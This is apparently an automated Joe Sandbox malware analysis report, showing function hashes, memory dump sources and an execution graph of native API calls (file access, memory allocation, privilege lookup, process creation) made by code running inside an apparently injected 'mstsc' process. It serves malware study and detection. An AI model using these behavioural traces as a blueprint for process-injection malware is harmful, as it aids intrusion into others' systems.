                                                                                                                                                                                        • Instruction Fuzzy Hash: 6351A231B012109FDB04ABB5D85877EB7A6AFD8700F15843BE806D77A1EF789C428B95
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 1c58c30963e1718b012e6c99ff3ef2b03564ef50fc0d8a6e77d3ca0ca08f2f38
                                                                                                                                                                                        • Instruction ID: 6809e9a2db9c3625d11b1c6345d8ba16ea5731b622f566a30a06d0a28bc1f759
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c58c30963e1718b012e6c99ff3ef2b03564ef50fc0d8a6e77d3ca0ca08f2f38
                                                                                                                                                                                        • Instruction Fuzzy Hash: 703125357406508FC759AB38C45892D77A2AF8A75536509F9E902CF3B2DA35EC41CB84
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 5000be15b1fc28e63508982914fb4ec74578ccedbd6bafef0bbc8ab87a8dbfba
                                                                                                                                                                                        • Instruction ID: 8d802ca98bdbc93639c3503943d5f6dd08e0f06b14bb2bc9c5ad66dfae5d895d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5000be15b1fc28e63508982914fb4ec74578ccedbd6bafef0bbc8ab87a8dbfba
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6921A731A02214AFCB04ABB4D8586AEBBB6EFD8350B11453BE402E3751EF749885CB91
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 239795c7b7845d281f980bc9a10940bce7aefe35909f3d4ea989bda306d0b432
                                                                                                                                                                                        • Instruction ID: f76cf9c577835c7ae04938bbb2ceefca555a1751376dd3d6dbd2b82fb0e794ac
                                                                                                                                                                                        • Opcode Fuzzy Hash: 239795c7b7845d281f980bc9a10940bce7aefe35909f3d4ea989bda306d0b432
                                                                                                                                                                                        • Instruction Fuzzy Hash: 44012C347021109FDB086BB4E85D26D77A6EBD8355704847AE806D37A1DF79CC418B95
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f77d28f40a921c7118607698be59957b1c11769a0526f765a18d2cd42fb0275a
                                                                                                                                                                                        • Instruction ID: 8981e493e8e5a2ec9b9d193821c9aadfd2aa8d4a79ecc7343d45a8809bd0cddb
                                                                                                                                                                                        • Opcode Fuzzy Hash: f77d28f40a921c7118607698be59957b1c11769a0526f765a18d2cd42fb0275a
                                                                                                                                                                                        • Instruction Fuzzy Hash: B9016D31A572508FCB416738F82815D3BA5EB85211345089BF446D7AB5DF7C2C95CB89
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000019.00000002.490954261.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00460000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_460000_niLILOT.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 59842f9e9edbddcc19f4b92687e345f695fadcea50e9e5f6de5884278cdae92e
                                                                                                                                                                                        • Instruction ID: 23ef75af4b3e7a988eb615c32254af2fdcde2929936b55f1a3685858d354f38f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 59842f9e9edbddcc19f4b92687e345f695fadcea50e9e5f6de5884278cdae92e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1AE08C7816E2809FCB028B34A858C543F70EB0610030146DAE881C72B3D638D80ACF13

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:1.3%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                        Total number of Nodes:364
                                                                                                                                                                                        Total number of Limit Nodes:53
                                                                                                                                                                                        execution_graph 102773 9f12d 102776 9b9a0 102773->102776 102775 9f132 102777 9b9c6 102776->102777 102782 89d40 102777->102782 102779 9b9d2 102781 9b9f6 102779->102781 102788 88f30 102779->102788 102781->102775 102816 89c90 102782->102816 102784 89d54 102784->102779 102785 89d4d 102785->102784 102823 8f180 102785->102823 102793 88f57 102788->102793 102790 88ffc 103066 8f410 102790->103066 102792 89006 102794 9bf60 RtlAllocateHeap 102792->102794 102813 890f2 102792->102813 102793->102813 103056 8f380 102793->103056 102795 8902a 102794->102795 102796 9bf60 RtlAllocateHeap 102795->102796 102797 8903b 102796->102797 102798 9bf60 RtlAllocateHeap 102797->102798 102799 8904c 102798->102799 103076 8ca90 102799->103076 102801 89059 102802 94a50 7 API calls 102801->102802 102803 89066 102802->102803 102804 94a50 7 API calls 102803->102804 102805 89077 102804->102805 102806 89084 102805->102806 102807 890a5 102805->102807 103082 8d620 102806->103082 102809 94a50 7 API calls 102807->102809 102812 890c1 102809->102812 102810 8908b 103086 88d00 102810->103086 102811 88d00 19 API calls 102811->102813 102812->102811 102813->102781 102818 89ca3 102816->102818 102817 89cb6 102817->102785 102818->102817 102831 9b280 102818->102831 102820 89cf3 102820->102817 102842 89ab0 102820->102842 102822 89d13 102822->102785 102824 8f199 102823->102824 102825 89d65 102824->102825 103048 9a7a0 102824->103048 102825->102779 102827 8f1d2 102828 8f1fd 102827->102828 103051 9a230 102827->103051 102830 9a460 NtClose 102828->102830 102830->102825 102832 9b299 102831->102832 102848 94a50 102832->102848 102834 9b2ba 102834->102820 102835 9b2b1 102835->102834 102873 9b0c0 102835->102873 102837 9b2ce 102837->102834 102838 9b302 102837->102838 102887 99ed0 102837->102887 102891 9bd90 102838->102891 103027 87ea0 102842->103027 102844 89ad1 102844->102822 102845 89aca 102845->102844 103040 88160 102845->103040 102849 94a64 102848->102849 102855 94b73 102848->102855 102849->102855 102894 9a330 102849->102894 102851 94bb7 102852 9bd90 RtlFreeHeap 102851->102852 102853 94bc3 102852->102853 102854 94d49 102853->102854 102853->102855 102858 94cb9 102853->102858 102859 94c61 102853->102859 102856 9a460 NtClose 102854->102856 102855->102835 102857 94d50 102856->102857 102857->102835 102858->102854 102867 94ccc 102858->102867 102860 94c7a 102859->102860 102861 94c66 102859->102861 102862 94c7f 102860->102862 102863 94c97 102860->102863 102937 94650 NtClose LdrInitializeThunk LdrInitializeThunk 102861->102937 102897 946f0 102862->102897 102863->102857 102905 94410 102863->102905 102865 94c70 102865->102835 102938 9a460 102867->102938 102868 94c8d 102868->102835 102871 94caf 102871->102835 102872 94d38 102872->102835 102874 9b0d1 102873->102874 102875 9b0e3 102874->102875 102955 9bd10 102874->102955 102875->102837 102877 9b104 102958 94070 102877->102958 102879 9b150 102879->102837 102880 9b127 102880->102879 102881 94070 2 API calls 102880->102881 102882 9b149 102881->102882 102882->102879 102990 95390 102882->102990 102884 9b1da 103000 99e90 102884->103000 102888 99eec 102887->102888 103023 21dfae8 LdrInitializeThunk 102888->103023 102889 99f07 102889->102838 103024 9a640 102891->103024 102893 9b329 102893->102820 102895 9af30 102894->102895 102896 9a34c NtCreateFile 102895->102896 102896->102851 102898 9470c 102897->102898 102899 94748 102898->102899 102900 94734 102898->102900 102902 9a460 NtClose 102899->102902 102901 9a460 NtClose 102900->102901 102903 9473d 102901->102903 102904 94751 102902->102904 102903->102868 102904->102868 102906 9445b 102905->102906 102907 9448e 102905->102907 102909 9a460 NtClose 102906->102909 102908 944aa 102907->102908 102913 945d9 102907->102913 102911 944cc 102908->102911 102912 944e1 102908->102912 102910 9447f 102909->102910 102910->102871 102914 9a460 NtClose 102911->102914 102915 944fc 102912->102915 102916 944e6 102912->102916 102917 9a460 NtClose 102913->102917 102918 944d5 102914->102918 102924 94501 102915->102924 102941 9bf60 102915->102941 102919 9a460 NtClose 102916->102919 102920 94639 102917->102920 102918->102871 102921 944ef 102919->102921 102920->102871 102921->102871 102931 94513 102924->102931 102944 9a3e0 102924->102944 102925 94567 102926 9459a 102925->102926 102927 94585 102925->102927 102928 9a460 NtClose 102926->102928 102929 9a460 NtClose 102927->102929 102930 945a3 102928->102930 102929->102931 102932 945cf 102930->102932 102947 9bb60 102930->102947 102931->102871 102932->102871 102934 945ba 102935 9bd90 RtlFreeHeap 102934->102935 102936 945c3 102935->102936 102936->102871 102937->102865 102939 9af30 102938->102939 102940 9a47c NtClose 102939->102940 102940->102872 102952 9a600 102941->102952 102943 9bf78 102943->102924 102945 9af30 102944->102945 102946 9a3fc NtReadFile 102945->102946 102946->102925 102948 9bb6d 102947->102948 102949 9bb84 102947->102949 102948->102949 102950 9bf60 RtlAllocateHeap 102948->102950 102949->102934 102951 9bb9b 102950->102951 102951->102934 102953 9af30 102952->102953 102954 9a61c RtlAllocateHeap 102953->102954 102954->102943 103004 9a510 102955->103004 102957 9bd3d 102957->102877 102959 94081 102958->102959 102960 94089 102958->102960 102959->102880 102961 9435c 102960->102961 103007 9cf00 102960->103007 102961->102880 102963 940dd 102964 9cf00 RtlAllocateHeap 102963->102964 102967 940e8 102964->102967 102965 94136 102968 9cf00 RtlAllocateHeap 102965->102968 102967->102965 102969 9d030 2 API calls 102967->102969 103021 9cfa0 RtlAllocateHeap RtlFreeHeap 102967->103021 102971 9414a 102968->102971 102969->102967 102970 941a7 102972 9cf00 RtlAllocateHeap 102970->102972 102971->102970 103012 9d030 102971->103012 102973 941bd 102972->102973 102975 941fa 102973->102975 102977 9d030 2 API calls 102973->102977 102976 9cf00 RtlAllocateHeap 102975->102976 102978 94205 102976->102978 102977->102973 102979 9d030 2 API calls 102978->102979 102985 9423f 102978->102985 102979->102978 102982 9cf60 RtlFreeHeap 102983 9433e 102982->102983 102984 9cf60 RtlFreeHeap 102983->102984 102986 94348 102984->102986 103018 9cf60 102985->103018 102987 9cf60 RtlFreeHeap 102986->102987 102988 94352 102987->102988 102989 9cf60 RtlFreeHeap 102988->102989 102989->102961 102991 953a1 102990->102991 102992 94a50 7 API calls 102991->102992 102994 953b7 102992->102994 102993 9540a 102993->102884 102994->102993 102995 953f2 102994->102995 102996 95405 102994->102996 102997 9bd90 RtlFreeHeap 102995->102997 102998 9bd90 RtlFreeHeap 102996->102998 102999 953f7 102997->102999 102998->102993 102999->102884 103001 99eac 103000->103001 103022 21dfdc0 LdrInitializeThunk 103001->103022 103002 99ec3 103002->102837 103005 9af30 103004->103005 103006 9a52c NtAllocateVirtualMemory 103005->103006 103006->102957 103008 9cf10 103007->103008 103009 9cf16 103007->103009 103008->102963 103010 9bf60 RtlAllocateHeap 103009->103010 103011 9cf3c 103010->103011 103011->102963 103013 9cfa0 103012->103013 103014 9cffd 103013->103014 103015 9bf60 RtlAllocateHeap 103013->103015 103014->102971 103016 9cfda 103015->103016 103017 9bd90 RtlFreeHeap 103016->103017 103017->103014 103019 9bd90 RtlFreeHeap 103018->103019 103020 94334 103019->103020 103020->102982 103021->102967 103022->103002 103023->102889 103025 9af30 103024->103025 103026 9a65c RtlFreeHeap 103025->103026 103026->102893 103028 87eab 103027->103028 103029 87eb0 103027->103029 103028->102845 103030 9bd10 NtAllocateVirtualMemory 103029->103030 103031 87ed5 103030->103031 103032 87f38 103031->103032 103033 99e90 LdrInitializeThunk 103031->103033 103034 87f3e 103031->103034 103039 9bd10 NtAllocateVirtualMemory 103031->103039 103043 9a590 103031->103043 103032->102845 103033->103031 103035 87f64 103034->103035 103037 9a590 LdrInitializeThunk 103034->103037 103035->102845 103038 87f55 103037->103038 103038->102845 103039->103031 103041 8817e 103040->103041 103042 9a590 LdrInitializeThunk 103040->103042 103041->102822 103042->103041 103044 9a5ac 103043->103044 103047 21dfb68 LdrInitializeThunk 103044->103047 103045 9a5c3 103045->103031 103047->103045 103049 9af30 103048->103049 103050 9a7bf LookupPrivilegeValueW 103049->103050 103050->102827 103052 9a24c 103051->103052 103055 21dfed0 LdrInitializeThunk 103052->103055 103053 9a26b 103053->102828 103055->103053 103057 8f3ac 103056->103057 103103 8f290 103057->103103 103060 8f3d9 103063 8f3e4 103060->103063 103064 9a460 NtClose 103060->103064 103061 8f3f1 103062 8f402 103061->103062 103065 9a460 NtClose 103061->103065 103062->102790 103063->102790 103064->103063 103065->103062 103067 8f43c 103066->103067 103068 8f290 2 API calls 103067->103068 103069 8f45f 103068->103069 103070 8f481 103069->103070 103071 8f469 103069->103071 103073 8f492 103070->103073 103075 9a460 NtClose 103070->103075 103072 8f474 103071->103072 103074 9a460 NtClose 103071->103074 103072->102792 103073->102792 103074->103072 103075->103073 103077 8caa6 103076->103077 103079 8cab0 103076->103079 103077->102801 103078 8cb74 103078->102801 103079->103078 103080 94a50 7 API calls 103079->103080 103081 8cbe5 103080->103081 103081->102801 103083 8d646 103082->103083 103114 8d310 103083->103114 103085 8d6ac 103085->102810 103139 8f6d0 103086->103139 103088 88d14 103100 88f25 103088->103100 103143 943a0 103088->103143 103090 88d70 103090->103100 103146 88ab0 103090->103146 103093 9cf00 RtlAllocateHeap 103094 88db2 103093->103094 103095 9d030 2 API calls 103094->103095 103096 88dc7 103095->103096 103097 87ea0 3 API calls 103096->103097 103096->103100 103101 88160 LdrInitializeThunk 103096->103101 103102 8c7b0 16 API calls 103096->103102 103151 8f670 103096->103151 103155 8f080 7 API calls 103096->103155 103097->103096 103100->102781 103101->103096 103102->103096 103104 8f360 103103->103104 103105 8f2aa 103103->103105 103104->103060 103104->103061 103109 99f50 103105->103109 103108 9a460 NtClose 103108->103104 103110 99f6c 103109->103110 103113 21e07ac LdrInitializeThunk 103110->103113 103111 8f354 103111->103108 103113->103111 103115 8d327 103114->103115 103120 8f710 103115->103120 103119 8d39b 103119->103085 103121 8f735 103120->103121 103131 881a0 103121->103131 103123 8f759 103124 8d36f 103123->103124 103125 94a50 7 API calls 103123->103125 103127 9bd90 RtlFreeHeap 103123->103127 103138 8f550 CreateProcessInternalW LdrInitializeThunk 103123->103138 103128 9a6b0 103124->103128 103125->103123 103127->103123 103129 9af30 103128->103129 103130 9a6cf CreateProcessInternalW 103129->103130 103130->103119 103132 8829f 103131->103132 103133 881b5 103131->103133 103132->103123 103133->103132 103134 94a50 7 API calls 103133->103134 103135 88222 103134->103135 103136 9bd90 RtlFreeHeap 103135->103136 103137 88249 103135->103137 103136->103137 103137->103123 103138->103123 103140 8f6ef 103139->103140 103141 8f6fd 103140->103141 103142 8f6f6 SetErrorMode 103140->103142 103141->103088 103142->103141 103145 943c6 103143->103145 103156 8f4a0 103143->103156 103145->103090 103147 9bd10 NtAllocateVirtualMemory 103146->103147 103150 88ad5 103147->103150 103148 88cea 103148->103093 103150->103148 103173 99850 103150->103173 103152 8f683 103151->103152 103208 99e60 103152->103208 103155->103096 103157 8f4bd 103156->103157 103163 99f90 103157->103163 103160 8f505 103160->103145 103164 99fac 103163->103164 103171 21dffb4 LdrInitializeThunk 103164->103171 103165 8f4fe 103165->103160 103167 99fe0 103165->103167 103168 99ffc 103167->103168 103172 21dfc60 LdrInitializeThunk 103168->103172 103169 8f52e 103169->103145 103171->103165 103172->103169 103174 9bf60 RtlAllocateHeap 103173->103174 103175 99867 103174->103175 103192 89310 103175->103192 103177 99882 103178 998a9 103177->103178 103179 998c0 103177->103179 103180 9bd90 RtlFreeHeap 103178->103180 103181 9bd10 NtAllocateVirtualMemory 103179->103181 103182 998b6 103180->103182 103183 998fa 103181->103183 103182->103148 103184 9bd10 NtAllocateVirtualMemory 103183->103184 103185 99913 103184->103185 103186 99ba0 103185->103186 103188 99bb4 103185->103188 103187 9bd90 RtlFreeHeap 103186->103187 103189 99baa 103187->103189 103190 9bd90 RtlFreeHeap 103188->103190 103189->103148 103191 99c09 103190->103191 103191->103148 103193 89335 103192->103193 103195 8938d 103193->103195 103196 8cf20 103193->103196 103195->103177 103197 8cf4c 103196->103197 103198 8cf6c 103197->103198 103203 9a1f0 103197->103203 103198->103195 103200 8cf8f 103200->103198 103201 9a460 NtClose 103200->103201 103202 8cfca 103201->103202 103202->103195 103204 9a20c 103203->103204 103207 21dfbb8 LdrInitializeThunk 103204->103207 103205 9a227 103205->103200 103207->103205 103209 99e7c 103208->103209 103212 21dfd8c LdrInitializeThunk 103209->103212 103210 8f6ae 103210->103096 103212->103210 103213 99050 103214 9bd10 NtAllocateVirtualMemory 103213->103214 103217 9908b 103214->103217 103215 9916c 103216 990f0 Sleep 103216->103217 103217->103215 103217->103216 103219 21df900 LdrInitializeThunk

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 196 9a330-9a381 call 9af30 NtCreateFile
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A37D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                        • String ID: .z`
                                                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                        • Instruction ID: 9485ad54f96afe5341ad736c9d384f84903a0002a59b5b52263d74decdbc4af1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                        • Instruction Fuzzy Hash: 68F0B2B2211208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 199 9a3e0-9a429 call 9af30 NtReadFile
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A425
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                        • String ID: 1J
                                                                                                                                                                                        • API String ID: 2738559852-2845985182
                                                                                                                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                        • Instruction ID: ed44a675b617bd3db82fc8b14b58137a535d62411a471b13865e22f32db39a27
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                        • Instruction Fuzzy Hash: 31F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158259BE1D97241DA30E811CBA0

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 208 9a460-9a489 call 9af30 NtClose
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtClose.NTDLL(PM,?,?,00094D50,00000000,FFFFFFFF), ref: 0009A485
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                        • String ID: PM
                                                                                                                                                                                        • API String ID: 3535843008-2952166990
                                                                                                                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                        • Instruction ID: ed9d2910e13bd0b8bc4f380d45e1098f0e9f4163baf3e5d73bda02a158b23ee7
                                                                                                                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9ED012762102146BDB10EBD8CC45ED7775CEF44750F154455BA185B242C530F50086E0

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 436 9a50a-9a50e 437 9a4bf-9a4cd 436->437 438 9a510-9a54d call 9af30 NtAllocateVirtualMemory 436->438
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A549
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                        • Opcode ID: 9e5db49cb2554ee88a75e092fcd4c9e71c0ca662b4477f5cf65fb09f56a5b1e5
                                                                                                                                                                                        • Instruction ID: f842753b64519067eacfe0996cd27a0b8ba912d3be475d7d13226f13ecaca01d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5db49cb2554ee88a75e092fcd4c9e71c0ca662b4477f5cf65fb09f56a5b1e5
                                                                                                                                                                                        • Instruction Fuzzy Hash: D5F0A9B22102086FCB24DF88DC80EABB7ADEF88754F108249FE4897201C630E8108BF0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A549
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                        • Instruction ID: b0f267d14870df2895e22410e5c1ac42993de72ff2289dbaf79f75324fbca76b
                                                                                                                                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF015B2210208ABCB14DF89CC81EEB77ADAF88754F118159BE0897241C630F811CBE0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.0000000002330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_21c0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000021C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 0000001B.00000002.637891163.00000000022B0000.00000040.00001000.00020000.00000000.sdmpDownload File
